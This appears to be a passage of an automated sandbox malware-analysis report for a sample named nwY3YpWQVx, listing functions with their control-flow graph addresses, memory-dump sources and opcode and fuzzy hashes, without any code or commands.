7ff9a63c5bc0 call 7ff9a63c5bc8 call 7ff9a63c5bd0 call 7ff9a63c5bd8 call 7ff9a63c5c10 call 7ff9a63c5c18 call 7ff9a63c5c20 call 7ff9a63c5c28 call 7ff9a63c5c30 call 7ff9a63c5c38 call 7ff9a63c5c40 call 7ff9a63c5c48 call 7ff9a63c5c60 call 7ff9a63c5c78 call 7ff9a63c5c80 call 7ff9a63c5c88 call 7ff9a63c5c90 call 7ff9a63c5c98 call 7ff9a63c5ca0 call 7ff9a63c5ca8 226->227 332 7ff9a63c67e8-7ff9a63c67ff 227->332 333 7ff9a63c6847-7ff9a63c6b7b 227->333 228->222 261->227 334 7ff9a63c6809-7ff9a63c6842 332->334 368 7ff9a63c6b82-7ff9a63c6c53 333->368 369 7ff9a63c6b7d 333->369 334->333 380 7ff9a63c6c5a 368->380 369->368 380->218
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ^_I
                                                                                                                • API String ID: 0-2136914531
                                                                                                                • Opcode ID: dc634c6e6ff49a0391903573bb051721e1ed8b87b48b5c68766250544dbd4807
                                                                                                                • Instruction ID: c410496ace91f85ff826898553449fc8a921948555fa404eb14cb5be9b8d55fd
                                                                                                                • Opcode Fuzzy Hash: dc634c6e6ff49a0391903573bb051721e1ed8b87b48b5c68766250544dbd4807
                                                                                                                • Instruction Fuzzy Hash: 9C925F30D19A198FEB94EF28D895BE9B7B1FF59300F5049B9E05DD3292CF75A9818B00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63BE28D Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 689 7ff9a63be28d-7ff9a63be297 691 7ff9a63be390-7ff9a63be3a2 689->691 692 7ff9a63be29d-7ff9a63be2b2 689->692 697 7ff9a63be3a8-7ff9a63be3bc 691->697 698 7ff9a63be560-7ff9a63be56d 691->698 695 7ff9a63be2b4-7ff9a63be2b7 692->695 696 7ff9a63be2cb-7ff9a63be309 692->696 695->696 700 7ff9a63be2b9-7ff9a63be2c9 695->700 714 7ff9a63be315-7ff9a63be321 696->714 715 7ff9a63be30b-7ff9a63be310 696->715 697->698 704 7ff9a63be3c2-7ff9a63be3d6 697->704 705 7ff9a63be573-7ff9a63be596 698->705 706 7ff9a63be5f9-7ff9a63be5fb 698->706 700->696 716 7ff9a63be70c-7ff9a63be75a 704->716 717 7ff9a63be3dc-7ff9a63be448 704->717 705->706 722 7ff9a63be598-7ff9a63be5cf 705->722 708 7ff9a63be601-7ff9a63be604 706->708 709 7ff9a63be68d-7ff9a63be70b 706->709 713 7ff9a63be606-7ff9a63be618 708->713 709->716 714->691 715->713 739 7ff9a63be7b6-7ff9a63be7c0 716->739 740 7ff9a63be75c-7ff9a63be76e 716->740 717->706 753 7ff9a63be44e-7ff9a63be49e 717->753 737 7ff9a63be5d1-7ff9a63be5d6 722->737 738 7ff9a63be5d8-7ff9a63be5dc 722->738 737->713 743 7ff9a63be5e3-7ff9a63be5f8 738->743 740->739 744 7ff9a63be770-7ff9a63be782 740->744 744->739 749 7ff9a63be784-7ff9a63be796 744->749 749->739 754 7ff9a63be798-7ff9a63be7a3 749->754 764 7ff9a63be4e4-7ff9a63be4f9 753->764 765 7ff9a63be4a0-7ff9a63be4ab 753->765 770 7ff9a63be4fb-7ff9a63be4fd 764->770 771 7ff9a63be50d-7ff9a63be528 764->771 768 7ff9a63be4c0-7ff9a63be4c3 765->768 769 7ff9a63be4ad-7ff9a63be4c3 765->769 768->764 772 7ff9a63be4c5-7ff9a63be4e2 768->772 769->764 769->772 774 7ff9a63be503-7ff9a63be508 770->774 775 7ff9a63be619-7ff9a63be663 770->775 781 7ff9a63be52a-7ff9a63be53b 771->781 772->781 774->713 775->709 783 7ff9a63be542-7ff9a63be544 781->783 785 7ff9a63be546-7ff9a63be54b 783->785 786 7ff9a63be550-7ff9a63be55b 783->786 785->713 786->743
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586263140.00007FF9A63BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63bd000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: V__H
                                                                                                                • API String ID: 0-3991301846
                                                                                                                • Opcode ID: 1645b41a0e11559907cd01e0478eaecfe46cfa099d68ff77ae1d25959a372ca0
                                                                                                                • Instruction ID: a702cdd4de6344936d9f125cf6e0c3dd70380428e56b7f3dbbd218766109546f
                                                                                                                • Opcode Fuzzy Hash: 1645b41a0e11559907cd01e0478eaecfe46cfa099d68ff77ae1d25959a372ca0
                                                                                                                • Instruction Fuzzy Hash: D7E1D421B1DE0A4FF698E72CA45977877C2EFD9B50B0444BAE48DC7293DE58BC424781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B8C44 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 791 7ff9a63b8c44-7ff9a63b8c4b 792 7ff9a63b8c56-7ff9a63b8cbf 791->792 793 7ff9a63b8c4d-7ff9a63b8c55 791->793 796 7ff9a63b8cc1-7ff9a63b8cc6 792->796 797 7ff9a63b8cc9-7ff9a63b8cfb LoadLibraryW 792->797 793->792 796->797 798 7ff9a63b8d03-7ff9a63b8d2a 797->798 799 7ff9a63b8cfd 797->799 799->798
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586237791.00007FF9A63B8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B8000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b8000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: a95f19e41a624211508c1f1111f64d07be7e7f444921a5e322f4a97da7afb662
                                                                                                                • Instruction ID: 9aa494613f52b9d54866f15746a352bee121d00fda7d1073f3251b323f55cfe6
                                                                                                                • Opcode Fuzzy Hash: a95f19e41a624211508c1f1111f64d07be7e7f444921a5e322f4a97da7afb662
                                                                                                                • Instruction Fuzzy Hash: B231C47190CA4C8FDB59DB9C9849BE9BBE1EF55720F04422BD04DD3252DBB4A4068B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B21A3 Relevance: 1.6, Strings: 1, Instructions: 323COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !`_I
                                                                                                                • API String ID: 0-1128162504
                                                                                                                • Opcode ID: e41f6d6fc2cfabd59d99d56ac3f8bf723187e20e5eeaa02d1e7c2f6f8a4f2b48
                                                                                                                • Instruction ID: 0ee030c899141d807c7683ce3c5b3b3d06b971de677afb9e3e06ce378164b7a3
                                                                                                                • Opcode Fuzzy Hash: e41f6d6fc2cfabd59d99d56ac3f8bf723187e20e5eeaa02d1e7c2f6f8a4f2b48
                                                                                                                • Instruction Fuzzy Hash: 28A1A427C0E6920FFB12AB7C78951F57FA0AF4372071844F7D4DC8A0A7EE586C8A9255
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B230D Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !`_I
                                                                                                                • API String ID: 0-1128162504
                                                                                                                • Opcode ID: 65cc7c384ff2cdcd9a3b5e5b30f7381f75d7854c94de8513944d02b6d9b2b89f
                                                                                                                • Instruction ID: 92e1daeb69eb3443362b93e1c9ca77265e0dd04990597d8136663f9f72a00c52
                                                                                                                • Opcode Fuzzy Hash: 65cc7c384ff2cdcd9a3b5e5b30f7381f75d7854c94de8513944d02b6d9b2b89f
                                                                                                                • Instruction Fuzzy Hash: E551A467D0FAC10FE3228A697C592747FA0BF9272071881FBE4DCC65D7E858684A8352
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B34B8 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \
                                                                                                                • API String ID: 0-2967466578
                                                                                                                • Opcode ID: 52557b6d9fda4c8b3db4b4f037427752e6c4e5654f98de811b2db1a456ebc7e2
                                                                                                                • Instruction ID: 791a07cd0bdb5e6756ed30ccfdcf75b4dd4b146e0497913398404880370661c9
                                                                                                                • Opcode Fuzzy Hash: 52557b6d9fda4c8b3db4b4f037427752e6c4e5654f98de811b2db1a456ebc7e2
                                                                                                                • Instruction Fuzzy Hash: B1611330A0DA555AF758D728805A33A76D1EFD6715F10443EF4DEC22C7DEA9BC434286
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B34C8 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 999 7ff9a63b34c8-7ff9a63b4a92 1001 7ff9a63b4a94-7ff9a63b4a98 999->1001 1002 7ff9a63b4a9a-7ff9a63b4aa6 999->1002 1003 7ff9a63b4aa8-7ff9a63b4aab 1001->1003 1002->1003 1004 7ff9a63b4acc-7ff9a63b4adc 1003->1004 1005 7ff9a63b4aad-7ff9a63b4ab2 1003->1005 1007 7ff9a63b4ae6-7ff9a63b4ae9 1004->1007 1008 7ff9a63b4ade-7ff9a63b4ae4 1004->1008 1005->1004 1006 7ff9a63b4ab4-7ff9a63b4ab9 1005->1006 1010 7ff9a63b4ac5-7ff9a63b4aca 1006->1010 1011 7ff9a63b4abb 1006->1011 1009 7ff9a63b4aee-7ff9a63b4af1 1007->1009 1008->1009 1012 7ff9a63b4af3 1009->1012 1013 7ff9a63b4afe-7ff9a63b4b08 1009->1013 1014 7ff9a63b4af5-7ff9a63b4afd 1010->1014 1011->1010 1015 7ff9a63b4b0a-7ff9a63b4b7a call 7ff9a63b32f0 call 7ff9a63b0458 call 7ff9a63b3658 1012->1015 1013->1014 1013->1015 1026 7ff9a63b4b7f-7ff9a63b4b8d 1015->1026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: '
                                                                                                                • API String ID: 0-1997036262
                                                                                                                • Opcode ID: 80f04733e871336614c24852a1180e61301fb5704c778164020cdcb6b4dee0c6
                                                                                                                • Instruction ID: 5c9fbb692939a5dd0f9223b8e827105fa54774eeef853bcfc8fdbb6ba09f391e
                                                                                                                • Opcode Fuzzy Hash: 80f04733e871336614c24852a1180e61301fb5704c778164020cdcb6b4dee0c6
                                                                                                                • Instruction Fuzzy Hash: 44319D11E0DAAA1EE365D669544837AB7C1EFC1700F0881BAF4DCC61CBDD9C7C468384
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B0BCD Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1027 7ff9a63b0bcd-7ff9a63b0be9 1028 7ff9a63b0beb 1027->1028 1029 7ff9a63b0bec-7ff9a63b0c2a 1027->1029 1028->1029 1030 7ff9a63b0c31-7ff9a63b0c5a call 7ff9a63b00c8 call 7ff9a63b0120 1029->1030 1031 7ff9a63b0c2c 1029->1031 1036 7ff9a63b0c61-7ff9a63b0c6b 1030->1036 1031->1030
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: KA`_^
                                                                                                                • API String ID: 0-3122099982
                                                                                                                • Opcode ID: f0105a867c5435f2db09bf9a1b61270cab7f247410719604b753bdb50aca8a8a
                                                                                                                • Instruction ID: 5276f42a0a48221215407770193bfd04b015c8dd3705ef51ca049119125c7d68
                                                                                                                • Opcode Fuzzy Hash: f0105a867c5435f2db09bf9a1b61270cab7f247410719604b753bdb50aca8a8a
                                                                                                                • Instruction Fuzzy Hash: 3311E631C0D68D4FDB52DB7498156EABFB0EF8A310F0504BAE098E3192CB79A452C751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C4200 Relevance: 1.1, Instructions: 1060COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1276 7ff9a63c4200-7ff9a63c4207 1277 7ff9a63c4212-7ff9a63c4219 1276->1277 1278 7ff9a63c4209-7ff9a63c4211 1276->1278 1279 7ff9a63c426c-7ff9a63c4272 1277->1279 1280 7ff9a63c421b-7ff9a63c422c 1277->1280 1278->1277 1282 7ff9a63c4276-7ff9a63c4307 1279->1282 1280->1282 1283 7ff9a63c422e-7ff9a63c4256 1280->1283 1295 7ff9a63c4368-7ff9a63c4436 1282->1295 1296 7ff9a63c4309-7ff9a63c434f 1282->1296 1284 7ff9a63c4258 1283->1284 1285 7ff9a63c425d-7ff9a63c426b 1283->1285 1284->1285 1285->1279 1312 7ff9a63c4438-7ff9a63c4496 1295->1312 1313 7ff9a63c4497-7ff9a63c4a93 1295->1313 1303 7ff9a63c4357-7ff9a63c4367 1296->1303 1303->1295 1312->1313 1381 7ff9a63c4aa5-7ff9a63c4aad 1313->1381 1382 7ff9a63c4a95-7ff9a63c4a9c 1313->1382 1383 7ff9a63c4aae-7ff9a63c4cbe 1381->1383 1382->1383 1384 7ff9a63c4a9e 1382->1384 1406 7ff9a63c4cc5-7ff9a63c4cdb 1383->1406 1384->1381
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1853d81ce42acd355303cfec27fd767ba1b1a100b04b8c305f0620e2f08340d0
                                                                                                                • Instruction ID: 500293c2d0b1989d329b3b02aebecb618dc42f4637b4fce43241ce512dcb491c
                                                                                                                • Opcode Fuzzy Hash: 1853d81ce42acd355303cfec27fd767ba1b1a100b04b8c305f0620e2f08340d0
                                                                                                                • Instruction Fuzzy Hash: FE82AF34A08A5D8FDB94EF28D888BA977F1FF69301F5144A5E41DD72A6CA75EC81CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C79E1 Relevance: .4, Instructions: 423COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 35e8731a16252355366a5bd76a6d022f39f1f3abeba689d18cc78aa39e6dfef4
                                                                                                                • Instruction ID: b819e734328bcb17cfc46de709c649eafe38fb768dd11f7f3cba45700c75dd7a
                                                                                                                • Opcode Fuzzy Hash: 35e8731a16252355366a5bd76a6d022f39f1f3abeba689d18cc78aa39e6dfef4
                                                                                                                • Instruction Fuzzy Hash: 3CF1D170909A2D8FEB94EF68D885BE9B7B2FF59301F5041A9D40DE3291CB74A985CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B3488 Relevance: .4, Instructions: 377COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6a9baf1e1f87ad03a76e6250fd4800d675e3353d8b1321710df17a39399015d
                                                                                                                • Instruction ID: 5f67518ebdef6a9371ade45dbd969d2deefa9ec41511aa54481916fd35111336
                                                                                                                • Opcode Fuzzy Hash: d6a9baf1e1f87ad03a76e6250fd4800d675e3353d8b1321710df17a39399015d
                                                                                                                • Instruction Fuzzy Hash: 43B10E21E1DA668EE358D6288048339B7D1EF95B15F1405BDF4DEC71D2DE68F8438781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C9AAD Relevance: .4, Instructions: 352COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 91aa8e4c31f6452df01d5e7cf9bba507a7592927f85c65e7c1a81bfaa0b9f250
                                                                                                                • Instruction ID: 6ad0e700d0dfa1a466baf2e9972bf60799ffd4dedd7344dcc020f66f6c581833
                                                                                                                • Opcode Fuzzy Hash: 91aa8e4c31f6452df01d5e7cf9bba507a7592927f85c65e7c1a81bfaa0b9f250
                                                                                                                • Instruction Fuzzy Hash: E3E1C430D1AA198FDB94EB68C885BECB7B1FF59701F5050A9E04EE3291CE75A985CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B0320 Relevance: .3, Instructions: 297COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b40224dc85c9de9ff9b839a0ca1dfc6849a63cca1a7129d8f03b820eb4e554ac
                                                                                                                • Instruction ID: 33d1ceab362a7090bbe83fd34a65ecf33c02aa9ed4cb86336165440d6250d683
                                                                                                                • Opcode Fuzzy Hash: b40224dc85c9de9ff9b839a0ca1dfc6849a63cca1a7129d8f03b820eb4e554ac
                                                                                                                • Instruction Fuzzy Hash: 69B12770D18A5D8FEB98DB28D8987A8B7E1FF99700F1040A9E05DE3291CF74A981CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B0D64 Relevance: .3, Instructions: 288COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8813509c2bfd55a03c3331f54ab7094a2678ffd6e85e8a22602f1a493e15407e
                                                                                                                • Instruction ID: 154272cd50f8e1c8ffa4f849c036d22c8d92a85f45f50c0c576027ea44ce8370
                                                                                                                • Opcode Fuzzy Hash: 8813509c2bfd55a03c3331f54ab7094a2678ffd6e85e8a22602f1a493e15407e
                                                                                                                • Instruction Fuzzy Hash: E9A12870D19A5D8FEB98DF28D8987A8B7E1FF99700F1041AAE05DD7291CF74A981CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B0DC1 Relevance: .3, Instructions: 271COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bd8ae9c1bacf3f4276f7801505a614d8e4c3492959d5f8fbce44a46c4719b097
                                                                                                                • Instruction ID: 5df724041bcb71accae64bb249a44430996af0c499e36d3d9b60686999bbb659
                                                                                                                • Opcode Fuzzy Hash: bd8ae9c1bacf3f4276f7801505a614d8e4c3492959d5f8fbce44a46c4719b097
                                                                                                                • Instruction Fuzzy Hash: 24A11770D19A5D8FEB98DB68D8987E8B7F1FF99700F0041AAE05DE7291CB746981CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63CABF5 Relevance: .2, Instructions: 249COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: feb844aa41ffa61a458425e3a88cf9b8e1f0e37164adb80898b8996a0162fcd7
                                                                                                                • Instruction ID: ecd303cc74ffaf33f6104fd6676b88080e1c4fef2e74c4f3fa39d8935bc58bc5
                                                                                                                • Opcode Fuzzy Hash: feb844aa41ffa61a458425e3a88cf9b8e1f0e37164adb80898b8996a0162fcd7
                                                                                                                • Instruction Fuzzy Hash: AC91A035C0AA1E8EDB69EB24C8457E9B3B0FF45B01F1041B9E86DD7191DE747A4ACB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C6C65 Relevance: .2, Instructions: 231COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 52f18c465801c27853622c025498e5eb00f11f79a95d5ab7610d686c30a5ea19
                                                                                                                • Instruction ID: 745539c3b692bc4ed692e47ef8e1e457c572aab38afa18f46be218b3f1c3c021
                                                                                                                • Opcode Fuzzy Hash: 52f18c465801c27853622c025498e5eb00f11f79a95d5ab7610d686c30a5ea19
                                                                                                                • Instruction Fuzzy Hash: 03719F71D0995D8FDF91EB68D858AE9BBF0FF5A310F0441B6E04CD7252DA34A8468B41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B1A30 Relevance: .2, Instructions: 231COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586194384.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63b0000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd96fcc265c14ec3691e7cb8017f6c37c8eed77c041f61a6b0a184fd85c26af2
                                                                                                                • Instruction ID: e4072289bb3d7bb1ae14f18609628a332d72900c54c0b2912b8c43392f944d27
                                                                                                                • Opcode Fuzzy Hash: fd96fcc265c14ec3691e7cb8017f6c37c8eed77c041f61a6b0a184fd85c26af2
                                                                                                                • Instruction Fuzzy Hash: 8951F222B1DE590FF798EB2CA45937977C2EBD9760B0445BAE44DC3292DE28A8474381
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C7FED Relevance: .2, Instructions: 228COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 49f6473e4ad321f2bc3e144d82fb7acf12b1f263bd0b7d8ac993b7dc6a51cfa2
                                                                                                                • Instruction ID: 3617b70e830f9ac7023dd16fed12a6417f0efeedd67a36c80e4b342f1fbc5ec3
                                                                                                                • Opcode Fuzzy Hash: 49f6473e4ad321f2bc3e144d82fb7acf12b1f263bd0b7d8ac993b7dc6a51cfa2
                                                                                                                • Instruction Fuzzy Hash: AA81D970919A198FEBA5DB28D895BE9B7B1FB59700F4044E9E40DD3281CF75AE85CF00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C9FA5 Relevance: .2, Instructions: 206COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.586287427.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9a63c2000_nwY3YpWQVx.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3679267f182939d69954058bebd30ad014f3591e41ff9dd87de73e451c39de50
                                                                                                                • Instruction ID: 6fff218fe1b43222f9800376eaf82177e01d565e173d05273f428703d2998e07
                                                                                                                • Opcode Fuzzy Hash: 3679267f182939d69954058bebd30ad014f3591e41ff9dd87de73e451c39de50
